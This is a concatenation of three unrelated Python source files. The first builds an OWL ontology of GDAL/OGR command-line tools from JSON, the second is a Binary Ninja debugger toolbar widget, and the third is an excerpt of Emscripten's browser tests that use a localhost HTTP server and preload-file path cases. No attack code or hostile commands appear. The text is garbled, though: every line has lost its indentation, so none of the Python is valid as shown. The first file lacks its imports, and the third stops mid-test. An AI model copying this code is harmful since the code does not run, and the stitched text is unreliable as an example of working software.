module_uri = 'http://www.egc.org/ont/process/gdal'
onto = get_ontology(module_uri)
onto, sh, skos, dcterms, props, foaf = OWLUtils.load_common(onto)
onto, geospatial = OWLUtils.load_geo_vocabl(onto)
onto, gb, task, data, cyber, context = OWLUtils.load_common_for_process_tool(onto)
print('ontologies imported')
import datetime
onto.metadata.created.append(datetime.datetime.today())
onto.metadata.creator.append('houzhiwei')
onto.metadata.title.append('GDAL/OGR')
onto.metadata.versionInfo.append('3.0.1')
with onto:
class GDALTool(gb.GeoprocessingFunctionality):
pass
class GDALInput(cyber.Input):
pass
class GDALOutput(cyber.Output):
pass
class GDALOption(cyber.Option):
pass
class GDALAvailableChoice(cyber.AvailableChoice):
pass
common_options = ['format', 'formats', 'optfile', 'config', 'debug']
def handle_parameter(tool, param):
pname = param['name']
p = None
_name = Preprocessor.io_name(pname, onto, common_options)
if 'isInputFile' in param.keys():
p = GDALInput(_name, prefLabel=locstr(pname, lang='en'))
p.isInput = True
tool.input.append(p)
OWLUtils.link_to_domain_concept(p, pname.replace('_', ' '))
elif "isOutputFile" in param.keys():
p = GDALOutput(_name, prefLabel=locstr(pname, lang='en'))
p.isOutput = True
tool.output.append(p)
OWLUtils.link_to_domain_concept(p, pname.replace('_', ' '))
p.identifier = pname
if param['flag']: p.flag = param['flag']
p.isOptional = param['isOptional']
p.description.append(locstr(param['explanation'], lang='en'))
p.datatype.append(OWLUtils.get_datatype_iris(param['dataType']))
def handle_options(tool, param, _onto):
pname = param['name']
_name = Preprocessor.io_name(pname, _onto, common_options)
p = GDALOption(_name, prefLabel=locstr(pname, lang='en'))
p.identifier = pname
if param['flag']: p.flag = param['flag']
p.isOptional = param['isOptional']
p.description.append(locstr(param['explanation'], lang='en'))
p.datatype.append(OWLUtils.get_datatype_iris(param['dataType']))
if "available_values" in param.keys():
for value in param['available_values']:
p.availableValue.append(value)
onto, _list = OWLUtils.resources_2_rdf_list(_onto, param['available_values'])
p.availableList.append(_list)
if "available_choices" in param.keys():
p, onto = OWLUtils.handle_choices(p, pname, param['available_choices'], GDALAvailableChoice, _onto)
if "input_pattern" in param.keys():
p.inputPattern.append(param['input_pattern'])
tool.option.append(p)
def handle_task(tool, task_name, des):
config = OWLUtils.get_config(module_path + '/config.ini')
category = tool_class(task_name)
task_cls = config.get('task', category.name)
task_name = Preprocessor.space_2_underline(task_name.replace(".py", ""))
if not task[task_name + "_task"]:
task_ins = task[task_cls](task_name + "_task", prefLabel=locstr(task_name + " task", lang='en'))
task_ins.isAtomicTask = True
task_ins.identifier = task_name
else:
task_ins = task[task_name + "_task"]
if (task_ins in tool.usedByTask) is False:
tool.usedByTask.append(task_ins)
if (tool in tool.processingTool) is False:
task_ins.processingTool.append(tool)
task_ins.description.append(locstr(des, lang='en'))
def tool_class(name):
if str(name).startswith('gnm'):
tool_cls = "GeographicNetworkPrograms"
elif str(name).startswith('ogr'):
tool_cls = "VectorPrograms"
elif str(name).startswith('gdalmd'):
tool_cls = "MultidimensionalRasterPrograms"
else:
tool_cls = "RasterPrograms"
return OWLUtils.create_onto_class(onto, tool_cls, GDALTool)
def map_to_owl(json_data):
for d in json_data:
name = d['name']
toolClass = tool_class(name)
name = Preprocessor.space_2_underline(name)
tool = toolClass(name, prefLabel=locstr(name, lang='en'))
tool.isToolOfSoftware.append(cyber.GDAL)
tool.identifier = name
tool.definition = d['summary']
tool.manualPageURL.append(d['manual_url'])
tool.executable = d['exec']
tool.commandLine.append(d['syntax'])
tool.description.append(locstr(d['description'], lang='en'))
OWLUtils.application_category(tool, [], ['GIS Analysis'], [str(toolClass.name).replace('Programs', '')])
keywords = OWLUtils.to_keywords(d['description'])
OWLUtils.link_to_domain_concept(tool, keywords)
for example in d['example']:
tool.example.append(example)
handle_task(tool, d['name'], d['description'])
for parameter in d['parameters']:
handle_parameter(tool, parameter)
for option in d['options']:
handle_options(tool, option, onto)
if __name__ == "__main__":
module_path = os.path.dirname(__file__)
with open(module_path + '/gdal_edited.json', 'r') as f:
jdata = json.load(f) # list
# otherwise will report stack overflow exception
size = 1024 * 1024 # related to system
threading.stack_size(size)
thread = threading.Thread(target=map_to_owl(jdata))
thread.start()
onto.save(file='gdal.owl', format="rdfxml")
# update task ontology
task.save()
print('gdal Done!')
|
ControlsWidget.py
|
from PySide2 import QtCore, QtGui
from PySide2.QtCore import Qt
from PySide2.QtWidgets import QApplication, QHBoxLayout, QVBoxLayout, QLabel, QWidget, QPushButton, QLineEdit, QToolBar, QToolButton, QMenu, QAction
from binaryninja import execute_on_main_thread_and_wait, BinaryView
from binaryninja.interaction import show_message_box, MessageBoxIcon, MessageBoxButtonSet, MessageBoxButtonResult
from binaryninjaui import ViewFrame
import platform
import threading
import traceback
import sys
import os
from . import AdapterSettingsDialog
from .. import binjaplug, DebugAdapter
def load_icon(fname_icon):
path_this_file = os.path.abspath(__file__)
path_this_dir = os.path.dirname(path_this_file)
path_icons = os.path.join(path_this_dir, '..', 'media', 'icons')
path_icon = os.path.join(path_icons, fname_icon)
pixmap = QtGui.QPixmap(path_icon)
#pixmap.fill(QtGui.QColor('red'))
#pixmap.setMask(pixmap.createMaskFromColor(QtGui.QColor('black'), QtGui.Qt.MaskOutColor))
icon = QtGui.QIcon()
icon.addPixmap(pixmap, QtGui.QIcon.Normal)
icon.addPixmap(pixmap, QtGui.QIcon.Disabled)
return icon
class DebugControlsWidget(QToolBar):
def __init__(self, parent, name, data, debug_state):
if not type(data) == BinaryView:
raise Exception('expected widget data to be a BinaryView')
self.bv = data
self.debug_state = debug_state
QToolBar.__init__(self, parent)
# TODO: Is there a cleaner way to do this?
self.setStyleSheet("""
QToolButton{padding: 4px 14px 4px 14px; font-size: 14pt;}
QToolButton:disabled{color: palette(alternate-base)}
""")
self.actionRun = QAction("Run", self)
self.actionRun.triggered.connect(lambda: self.perform_run())
self.actionRun.setIcon(load_icon('run.svg'))
self.actionRestart = QAction("Restart", self)
self.actionRestart.triggered.connect(lambda: self.perform_restart())
self.actionRestart.setIcon(load_icon('restart.svg'))
self.actionQuit = QAction("Quit", self)
self.actionQuit.triggered.connect(lambda: self.perform_quit())
self.actionQuit.setIcon(load_icon('cancel.svg'))
self.actionAttach = QAction("Attach", self)
self.actionAttach.triggered.connect(lambda: self.perform_attach())
self.actionAttach.setIcon(load_icon('connect.svg'))
self.actionDetach = QAction("Detach", self)
self.actionDetach.triggered.connect(lambda: self.perform_detach())
self.actionDetach.setIcon(load_icon('disconnect.svg'))
self.actionSettings = QAction("Settings...", self)
self.actionSettings.triggered.connect(lambda: self.perform_settings())
self.actionPause = QAction("Pause", self)
self.actionPause.triggered.connect(lambda: self.perform_pause())
self.actionPause.setIcon(load_icon('pause.svg'))
self.actionResume = QAction("Resume", self)
self.actionResume.triggered.connect(lambda: self.perform_resume())
self.actionResume.setIcon(load_icon('resume.svg'))
self.actionStepIntoAsm = QAction("Step Into (Assembly)", self)
self.actionStepIntoAsm.triggered.connect(lambda: self.perform_step_into_asm())
self.actionStepIntoAsm.setIcon(load_icon('stepinto.svg'))
self.actionStepIntoIL = QAction("Step Into", self)
self.actionStepIntoIL.triggered.connect(lambda: self.perform_step_into_il())
self.actionStepIntoIL.setIcon(load_icon('stepinto.svg'))
self.actionStepOverAsm = QAction("Step Over (Assembly)", self)
self.actionStepOverAsm.triggered.connect(lambda: self.perform_step_over_asm())
self.actionStepOverAsm.setIcon(load_icon('stepover.svg'))
self.actionStepOverIL = QAction("Step Over", self)
self.actionStepOverIL.triggered.connect(lambda: self.perform_step_over_il())
self.actionStepOverIL.setIcon(load_icon('stepover.svg'))
self.actionStepReturn = QAction("Step Return", self)
self.actionStepReturn.triggered.connect(lambda: self.perform_step_return())
self.actionStepReturn.setIcon(load_icon('stepout.svg'))
# session control menu
self.controlMenu = QMenu("Process Control", self)
self.controlMenu.addAction(self.actionRun)
self.controlMenu.addAction(self.actionRestart)
self.controlMenu.addAction(self.actionQuit)
self.controlMenu.addSeparator()
self.controlMenu.addAction(self.actionAttach)
self.controlMenu.addAction(self.actionDetach)
self.controlMenu.addSeparator()
self.controlMenu.addAction(self.actionSettings)
self.stepIntoMenu = QMenu("Step Into", self)
self.stepIntoMenu.addAction(self.actionStepIntoIL)
self.stepIntoMenu.addAction(self.actionStepIntoAsm)
self.stepOverMenu = QMenu("Step Over", self)
self.stepOverMenu.addAction(self.actionStepOverIL)
self.stepOverMenu.addAction(self.actionStepOverAsm)
self.btnControl = QToolButton(self)
self.btnControl.setMenu(self.controlMenu)
self.btnControl.setPopupMode(QToolButton.MenuButtonPopup)
self.btnControl.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnControl.setDefaultAction(self.actionRun)
self.addWidget(self.btnControl)
# execution control buttons
self.btnPauseResume = QToolButton(self)
self.btnPauseResume.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnPauseResume.setDefaultAction(self.actionPause)
self.addWidget(self.btnPauseResume)
#self.addAction(self.actionPause)
#self.addAction(self.actionResume)
self.btnStepInto = QToolButton(self)
self.btnStepInto.setMenu(self.stepIntoMenu)
self.btnStepInto.setPopupMode(QToolButton.MenuButtonPopup)
self.btnStepInto.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnStepInto.setDefaultAction(self.actionStepIntoIL)
self.addWidget(self.btnStepInto)
self.btnStepOver = QToolButton(self)
self.btnStepOver.setMenu(self.stepOverMenu)
self.btnStepOver.setPopupMode(QToolButton.MenuButtonPopup)
self.btnStepOver.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnStepOver.setDefaultAction(self.actionStepOverIL)
self.addWidget(self.btnStepOver)
# TODO: Step until returning from current function
self.btnStepReturn = QToolButton(self)
self.btnStepReturn.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnStepReturn.setDefaultAction(self.actionStepReturn)
self.addWidget(self.btnStepReturn)
#self.addAction(self.actionStepReturn)
self.threadMenu = QMenu("Threads", self)
self.btnThreads = QToolButton(self)
self.btnThreads.setMenu(self.threadMenu)
self.btnThreads.setPopupMode(QToolButton.InstantPopup)
self.btnThreads.setToolButtonStyle(Qt.ToolButtonTextOnly)
self.addWidget(self.btnThreads)
self.set_thread_list([])
self.editStatus = QLineEdit('INACTIVE', self)
self.editStatus.setReadOnly(True)
self.editStatus.setAlignment(QtCore.Qt.AlignCenter)
self.addWidget(self.editStatus)
# disable buttons
self.set_actions_enabled(Run=self.can_exec(), Restart=False, Quit=False, Attach=self.can_connect(), Detach=False, Pause=False, Resume=False, StepInto=False, StepOver=False, StepReturn=False)
self.set_resume_pause_action("Pause")
self.set_default_process_action("Attach" if self.can_connect() else "Run")
def __del__(self):
# TODO: Move this elsewhere
# This widget is tasked with cleaning up the state after the view is closed
# binjaplug.delete_state(self.bv)
pass
# -------------------------------------------------------------------------
# Helpers
# -------------------------------------------------------------------------
def can_exec(self):
return DebugAdapter.ADAPTER_TYPE.use_exec(self.debug_state.adapter_type)
def can_connect(self):
return DebugAdapter.ADAPTER_TYPE.use_connect(self.debug_state.adapter_type)
def alert_need_install(self, proc):
message = "Cannot start debugger: {} not found on {}.".format(proc, "the target machine" if self.can_connect() else "your machine")
adapter_type = self.debug_state.adapter_type
# TODO: detect remote os correctly, as gdb/lldb are compatible with both macos and linux
if adapter_type == DebugAdapter.ADAPTER_TYPE.LOCAL_GDB or adapter_type == DebugAdapter.ADAPTER_TYPE.REMOTE_GDB:
remote_os = "Linux"
elif adapter_type == DebugAdapter.ADAPTER_TYPE.LOCAL_LLDB or adapter_type == DebugAdapter.ADAPTER_TYPE.REMOTE_LLDB:
remote_os = "Darwin"
elif adapter_type == DebugAdapter.ADAPTER_TYPE.LOCAL_DBGENG:
remote_os = "Windows"
else:
# Uncertain
remote_os = platform.system()
if remote_os == "Linux":
message += "\nYou can find this in your package manager or build it from source."
elif remote_os == "Darwin":
if proc == "lldb":
message += "\nYou need to install it by running the following command in Terminal:\nxcode-select --install"
elif proc == "gdbserver":
message += "\nYou can find this in your package manager or build it from source."
else:
message += "\nYou need to install this manually."
elif remote_os == "Windows":
# TODO: dbgeng does not currently throw this
message += "\nYou need to reinstall the debugger plugin."
else:
message += "\nYou need to install this manually."
show_message_box("Cannot Start Debugger", message, icon=MessageBoxIcon.ErrorIcon)
# -------------------------------------------------------------------------
# UIActions
# -------------------------------------------------------------------------
def perform_run(self):
def perform_run_thread():
while True:
try:
self.debug_state.run()
execute_on_main_thread_and_wait(perform_run_after)
except ConnectionRefusedError:
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: Connection Refused'))
except DebugAdapter.ProcessStartError as e:
execute_on_main_thread_and_wait(lambda: perform_run_error(str(e)))
except DebugAdapter.NotExecutableError as e:
fpath = e.args[0]
if platform.system() != 'Windows':
msg = '%s is not executable, would you like to set +x and retry?' % fpath
res = show_message_box('Error', msg, MessageBoxButtonSet.YesNoButtonSet, MessageBoxIcon.ErrorIcon)
if res == MessageBoxButtonResult.YesButton:
os.chmod(fpath, os.stat(fpath).st_mode | 0o100)
continue
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: Target Not Executable'))
except DebugAdapter.NotInstalledError as e:
execute_on_main_thread_and_wait(lambda: self.alert_need_install(e.args[0]))
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: Debugger Not Installed'))
except DebugAdapter.PermissionDeniedError as e:
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: Permission denied'))
if platform.system() == 'Darwin':
res = show_message_box('Error', 'Developer tools need to be enabled to debug programs. This can be authorized either from here or by starting a debugger in Xcode.', MessageBoxButtonSet.OKButtonSet, MessageBoxIcon.ErrorIcon)
except Exception as e:
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: ' + ' '.join(e.args)))
traceback.print_exc(file=sys.stderr)
break
def perform_run_after():
self.state_stopped()
self.debug_state.ui.on_step()
def perform_run_error(e):
self.state_error(e)
self.state_starting('STARTING')
threading.Thread(target=perform_run_thread).start()
def perform_restart(self):
def perform_restart_thread():
try:
self.debug_state.restart()
execute_on_main_thread_and_wait(perform_restart_after)
except ConnectionRefusedError:
execute_on_main_thread_and_wait(lambda: perform_restart_error('ERROR: Connection Refused'))
except Exception as e:
execute_on_main_thread_and_wait(lambda: perform_restart_error('ERROR: ' + ' '.join(e.args)))
traceback.print_exc(file=sys.stderr)
def perform_restart_after():
self.state_stopped()
self.debug_state.ui.on_step()
def perform_restart_error(e):
self.state_error(e)
self.state_starting('RESTARTING')
threading.Thread(target=perform_restart_thread).start()
def perform_quit(self):
self.debug_state.quit()
self.state_inactive()
self.debug_state.ui.on_step()
def perform_attach(self):
def perform_attach_thread():
try:
self.debug_state.attach()
execute_on_main_thread_and_wait(perform_attach_after)
except ConnectionRefusedError:
execute_on_main_thread_and_wait(lambda: perform_attach_error('ERROR: Connection Refused'))
except TimeoutError:
execute_on_main_thread_and_wait(lambda: perform_attach_error('ERROR: Connection Refused'))
except Exception as e:
execute_on_main_thread_and_wait(lambda: perform_attach_error('ERROR: ' + ' '.join(e.args)))
traceback.print_exc(file=sys.stderr)
def perform_attach_after():
self.state_stopped()
self.debug_state.ui.on_step()
def perform_attach_error(e):
self.state_error(e)
self.state_starting('ATTACHING')
threading.Thread(target=perform_attach_thread).start()
def perform_detach(self):
self.debug_state.detach()
self.state_inactive()
self.debug_state.ui.on_step()
def perform_settings(self):
def settings_finished():
if self.debug_state.running:
self.state_running()
elif self.debug_state.connected:
local_rip = self.debug_state.local_ip
if self.debug_state.bv.read(local_rip, 1) and len(self.debug_state.bv.get_functions_containing(local_rip)) > 0:
self.state_stopped()
else:
self.state_stopped_extern()
else:
self.state_inactive()
dialog = AdapterSettingsDialog.AdapterSettingsDialog(self, self.bv)
dialog.show()
dialog.finished.connect(settings_finished)
def perform_pause(self):
self.debug_state.pause()
# Don't update state here-- one of the other buttons is running in a thread and updating for us
def perform_resume(self):
def perform_resume_thread():
(reason, data) = self.debug_state.go()
execute_on_main_thread_and_wait(lambda: perform_resume_after(reason, data))
def perform_resume_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_running()
threading.Thread(target=perform_resume_thread).start()
def perform_step_into_asm(self):
def perform_step_into_asm_thread():
(reason, data) = self.debug_state.step_into()
execute_on_main_thread_and_wait(lambda: perform_step_into_asm_after(reason, data))
def perform_step_into_asm_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_into_asm_thread).start()
def perform_step_into_il(self):
disasm = self.debug_state.ui.debug_view.binary_editor.getDisassembly()
graph_type = disasm.getILViewType()
def perform_step_into_il_thread():
(reason, data) = self.debug_state.step_into(graph_type)
execute_on_main_thread_and_wait(lambda: perform_step_into_il_after(reason, data))
def perform_step_into_il_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_into_il_thread).start()
def perform_step_over_asm(self):
def perform_step_over_asm_thread():
(reason, data) = self.debug_state.step_over()
execute_on_main_thread_and_wait(lambda: perform_step_over_asm_after(reason, data))
def perform_step_over_asm_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_over_asm_thread).start()
def perform_step_over_il(self):
disasm = self.debug_state.ui.debug_view.binary_editor.getDisassembly()
graph_type = disasm.getILViewType()
def perform_step_over_il_thread():
(reason, data) = self.debug_state.step_over(graph_type)
execute_on_main_thread_and_wait(lambda: perform_step_over_il_after(reason, data))
def perform_step_over_il_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_over_il_thread).start()
def perform_step_return(self):
def perform_step_return_thread():
(reason, data) = self.debug_state.step_return()
execute_on_main_thread_and_wait(lambda: perform_step_return_after(reason, data))
def perform_step_return_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_return_thread).start()
# -------------------------------------------------------------------------
# Control state setters
# -------------------------------------------------------------------------
def set_actions_enabled(self, **kwargs):
def enable_step_into(e):
self.actionStepIntoAsm.setEnabled(e)
self.actionStepIntoIL.setEnabled(e)
def enable_step_over(e):
self.actionStepOverAsm.setEnabled(e)
self.actionStepOverIL.setEnabled(e)
def enable_starting(e):
self.actionRun.setEnabled(e and self.can_exec())
self.actionAttach.setEnabled(e and self.can_connect())
def enable_stopping(e):
self.actionRestart.setEnabled(e)
self.actionQuit.setEnabled(e)
self.actionDetach.setEnabled(e)
def enable_stepping(e):
self.actionStepIntoAsm.setEnabled(e)
self.actionStepIntoIL.setEnabled(e)
self.actionStepOverAsm.setEnabled(e)
self.actionStepOverIL.setEnabled(e)
self.actionStepReturn.setEnabled(e)
actions = {
"Run": lambda e: self.actionRun.setEnabled(e),
"Restart": lambda e: self.actionRestart.setEnabled(e),
"Quit": lambda e: self.actionQuit.setEnabled(e),
"Attach": lambda e: self.actionAttach.setEnabled(e),
"Detach": lambda e: self.actionDetach.setEnabled(e),
"Pause": lambda e: self.actionPause.setEnabled(e),
"Resume": lambda e: self.actionResume.setEnabled(e),
"StepInto": enable_step_into,
"StepOver": enable_step_over,
"StepReturn": lambda e: self.actionStepReturn.setEnabled(e),
"Threads": lambda e: self.btnThreads.setEnabled(e),
"Starting": enable_starting,
"Stopping": enable_stopping,
"Stepping": enable_stepping,
}
for (action, enabled) in kwargs.items():
actions[action](enabled)
def set_default_process_action(self, action):
actions = {
"Run": self.actionRun,
"Restart": self.actionRestart,
"Quit": self.actionQuit,
"Attach": self.actionAttach,
"Detach": self.actionDetach,
}
self.btnControl.setDefaultAction(actions[action])
def set_resume_pause_action(self, action):
lookup = {'Resume':self.actionResume, 'Pause':self.actionPause}
self.btnPauseResume.setDefaultAction(lookup[action])
def set_thread_list(self, threads):
def select_thread_fn(tid):
def select_thread(tid):
stateObj = binjaplug.get_state(self.bv)
if stateObj.connected and not stateObj.running:
stateObj.threads.current = tid
stateObj.ui.context_display()
stateObj.ui.on_step()
else:
print('cannot set thread in current state')
return lambda: select_thread(tid)
self.threadMenu.clear()
if len(threads) > 0:
for thread in threads:
item_name = "Thread {} at {}".format(thread['tid'], hex(thread['ip']))
action = self.threadMenu.addAction(item_name, select_thread_fn(thread['tid']))
if thread['selected']:
self.btnThreads.setDefaultAction(action)
else:
defaultThreadAction = self.threadMenu.addAction("Thread List")
defaultThreadAction.setEnabled(False)
self.btnThreads.setDefaultAction(defaultThreadAction)
# -------------------------------------------------------------------------
# State handling
# -------------------------------------------------------------------------
def state_starting(self, msg=None):
self.editStatus.setText(msg or 'INACTIVE')
self.set_actions_enabled(Starting=False, Stopping=False, Stepping=False, Pause=False, Resume=False, Threads=False)
self.set_default_process_action("Attach" if self.can_connect() else "Run")
self.set_thread_list([])
self.set_resume_pause_action("Pause")
def state_inactive(self, msg=None):
self.editStatus.setText(msg or 'INACTIVE')
self.set_actions_enabled(Starting=True, Stopping=False, Stepping=False, Pause=False, Resume=False, Threads=False)
self.set_default_process_action("Attach" if self.can_connect() else "Run")
self.set_thread_list([])
self.set_resume_pause_action("Pause")
def state_stopped(self, msg=None):
self.editStatus.setText(msg or 'STOPPED')
self.set_actions_enabled(Starting=False, Stopping=True, Stepping=True, Pause=True, Resume=True, Threads=True)
self.set_default_process_action("Quit")
self.set_resume_pause_action("Resume")
def state_stopped_extern(self, msg=None):
self.editStatus.setText(msg or 'STOPPED')
self.set_actions_enabled(Starting=False, Stopping=True, Stepping=True, StepReturn=False, Pause=True, Resume=True, Threads=True)
self.set_default_process_action("Quit")
self.set_resume_pause_action("Resume")
def state_running(self, msg=None):
self.editStatus.setText(msg or 'RUNNING')
self.set_actions_enabled(Starting=False, Stopping=True, Stepping=False, Pause=True, Resume=False, Threads=False)
self.set_default_process_action("Quit")
self.set_resume_pause_action("Pause")
def state_busy(self, msg=None):
self.editStatus.setText(msg or 'RUNNING')
self.set_actions_enabled(Starting=False, Stopping=True, Stepping=False, Pause=True, Resume=False, Threads=False)
self.set_default_process_action("Quit")
self.set_resume_pause_action("Pause")
def state_error(self, msg=None):
self.editStatus.setText(msg or 'ERROR')
if self.debug_state.connected:
self.set_actions_enabled(Starting=False, Stopping=True, Pause=False, Resume=False, Stepping=False, Threads=False)
self.set_default_process_action("Detach" if self.can_connect() else "Quit")
else:
self.set_actions_enabled(Starting=True, Stopping=False, Pause=False, Resume=False, Stepping=False, Threads=False)
self.set_default_process_action("Attach" if self.can_connect() else "Run")
self.set_thread_list([])
self.set_resume_pause_action("Resume")
def handle_stop_return(self, reason, data):
if reason == DebugAdapter.STOP_REASON.STDOUT_MESSAGE:
self.state_stopped('stdout: '+data)
elif reason == DebugAdapter.STOP_REASON.PROCESS_EXITED:
self.debug_state.quit()
self.state_inactive('process exited, return code=%d' % data)
elif reason == DebugAdapter.STOP_REASON.BACKEND_DISCONNECTED:
self.debug_state.quit()
self.state_inactive('backend disconnected (process exited?)')
|
test_browser.py
|
# coding=utf-8
from __future__ import print_function
import multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root, has_browser, get_browser
from tools.shared import *
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
requires_hardware = unittest.skipIf(os.environ.get("EM_LACKS_HARDWARE_ACCESS"), "This test requires hardware access including graphics and sound devices")
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']): self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser(): self.skipTest('need a browser')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4', '-s', 'WASM=0'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
# TODO: wasm support for source maps
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
Popen([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0']).communicate()
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
if WINDOWS and Building.which('mingw32-make'): # On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
